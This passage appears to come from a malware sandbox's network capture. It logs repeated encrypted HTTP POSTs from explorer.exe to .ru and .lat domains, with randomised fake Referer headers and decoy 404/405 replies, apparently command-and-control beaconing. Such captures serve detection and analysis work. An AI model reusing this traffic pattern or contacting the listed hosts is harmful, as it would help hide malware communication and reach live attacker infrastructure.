                                            Content-Length: 306
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:27.820805073 CET306OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f2 4e 28 94
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)N(cKV?RToV!&Z/,yVWqm^T3M, c^Lum{V"pnBW'PqZWzUi%"A^cv5Vs&R'N
                                            Dec 19, 2024 10:59:29.184083939 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:28 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.549920194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:29.315151930 CET279OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://vtrdqlyaxcnu.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 298
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:29.315171957 CET298OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 87 1d 2e 94
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)._f_(uZ>{x=I@V5zJ\:+*RkTvVnegI(zs6n/hX8:b~rFzhiIn];OT'r0D[6%;jP5}W\d
                                            Dec 19, 2024 10:59:30.651345015 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.54992694.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:30.916336060 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://weaudxshysghyed.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 177
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:30.918894053 CET177OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f0 0f 26 ba
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)&?_r137U thBWuR7P)@mR|Xlw/y~-x
                                            Dec 19, 2024 10:59:32.322904110 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:32 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.54992894.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:32.475130081 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://rmlqaewyesef.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 295
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:32.475718021 CET295OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 16 21 94
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)!d}8DOzIm:ExL`Ps2G]cg;k/SG-QwjeO8_7{j?zZ{J3F[}4,e$`2p:hi(|HP]
                                            Dec 19, 2024 10:59:33.845381975 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:33 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.549933194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:33.970565081 CET278OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ipahuxcmqng.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 258
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:33.970581055 CET258OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ed 45 36 bc
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)E6>ITPw%^ZR3f5^wvfywG_Jm}\\qsh!fcuc/$X>jIF9tkh,<8<=Zy*I<shGO
                                            Dec 19, 2024 10:59:35.310946941 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.54993994.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:35.854039907 CET283OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://yebogyjrnkttg.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 322
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:35.854075909 CET322OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 47 21 cb
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)G!11?tjb%)<"ybE6-onoZi$gg#8]IkT?cX8G!$;lm {zl)$%{_O<eH``A4)O}dF{>
                                            Dec 19, 2024 10:59:37.220084906 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:36 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.54994294.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:37.353260040 CET284OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mbqncgggetrc.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 289
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:37.354517937 CET289OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9c 26 20 8f
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)& EK^9pZ 9)De*(A/P6%s`N_|ojQxf|}>+0?%ht]`4"fv-kij5.r;"ifpc-P/ZF6}
                                            Dec 19, 2024 10:59:38.727760077 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:38 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.549947194.85.61.76801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:38.862231970 CET278OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://qjvjeavryrj.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 265
                                            Host: connecticutproperty.ru
                                            Dec 19, 2024 10:59:38.862231970 CET265OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e6 04 21 bf
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)!b[>iI]/Z2bHICWVmg^m__Ft/T._x_.Y:ba.n)g3*u?9W+ ;G!sSZ
                                            Dec 19, 2024 10:59:40.196259022 CET300INHTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:39 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.54995394.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:41.194796085 CET285OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jisidxjkipgcbgc.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 316
                                            Host: constractionscity1991.lat
                                            Dec 19, 2024 10:59:41.194829941 CET316OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a3 46 29 9e
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)F)+^'u?w:X4;@f_?{p+QYLMpVK"16lpw75L- x^0V^)lmiE9qi%g}.IdO86JuU*r
                                            Dec 19, 2024 10:59:42.558610916 CET595INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:42 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                            Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.54995894.156.177.51801028C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 19, 2024 10:59:42.688040018 CET287OUTPOST / HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://uloowasjyvbxjte.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 324
                                            Host: restructurisationservice.ru
                                            Dec 19, 2024 10:59:42.688106060 CET324OUTData Raw: a1 5f 08 5a f3 34 58 be bc 4b a4 bd 8d c7 2a 3c 56 43 b2 53 17 bb 42 22 a1 5c bc 19 01 f8 04 53 cb 57 d4 fc 4a d4 73 3c 5c be cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 83 49 62 96
                                            Data Ascii: _Z4XK*<VCSB"\SWJs<\M.x]2m-^JrC)Ib,{;Zz@#"8pMxS+V~p 4Gx]GdF`JTHx~ws(p]?l;#Y*o LbtZ7R{>C~ppc?x`7\
                                            Dec 19, 2024 10:59:44.049314976 CET597INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Thu, 19 Dec 2024 09:59:43 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
